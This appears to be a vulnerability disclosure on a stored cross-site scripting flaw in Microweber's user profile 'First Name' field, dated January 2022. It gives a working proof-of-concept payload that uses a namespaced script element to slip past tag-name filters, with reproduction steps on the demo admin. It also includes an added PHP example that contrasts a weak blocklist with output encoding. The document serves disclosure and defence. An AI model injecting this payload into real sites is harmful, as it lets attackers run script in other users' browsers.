Cross-site Scripting (XSS) - Stored in microweber/microweber
Jan 27th 2022
Stored XSS occurs when changing a user's profile
Proof of Concept
XSS PoC: "><something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(document.domain)</something:script>
1. Open https://demo.microweber.org/demo/admin
2. Go to "Users" > "Edit profile"
3. Change the value of "First Name" to the XSS PoC
4. Refresh
Through this vulnerability, an attacker is able to execute malicious scripts.
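The PoC value begins with `">` and uses an element named `something:script` rather than `script`, which is why encoding at output matters more than filtering tag names. The PHP below is an added example, not Microweber's code: `stripScriptTags`, `encodeForHtml`, `renderInput` and the `first_name` field are hypothetical, and the tag-name blocklist is an assumed weak filter shown only for contrast.

```php
<?php
// Added example: hypothetical helpers, not Microweber's code.

// The "First Name" value from the proof of concept in this report.
$firstName = '"><something:script xmlns:something="http://www.w3.org/1999/xhtml">'
           . 'alert(document.domain)</something:script>';

// Assumed weak filter: strips only elements literally named "script".
function stripScriptTags(string $value): string
{
    return preg_replace('~</?script\b[^>]*>~i', '', $value) ?? $value;
}

// Output encoding for HTML text and quoted attribute values.
function encodeForHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hypothetical profile form field; the caller decides what goes into value="".
function renderInput(string $value): string
{
    return '<input type="text" name="first_name" value="' . $value . '">';
}

$filtered = stripScriptTags($firstName);
$encoded  = encodeForHtml($firstName);

// The blocklist pattern needs "<script" or "</script"; the payload's tags
// are "<something:script" and "</something:script", so nothing is removed.
echo 'blocklist changed the value: ', var_export($filtered !== $firstName, true), PHP_EOL;
echo renderInput($filtered), PHP_EOL;

// After encoding, no raw quote or angle bracket remains, so the value
// cannot close the attribute or open a new element.
echo 'encoded value has markup characters: ',
     var_export(preg_match('/["<>]/', $encoded) === 1, true), PHP_EOL;
echo renderInput($encoded), PHP_EOL;
```

Encoding at the point of output also covers values that were stored before any input-side fix was deployed.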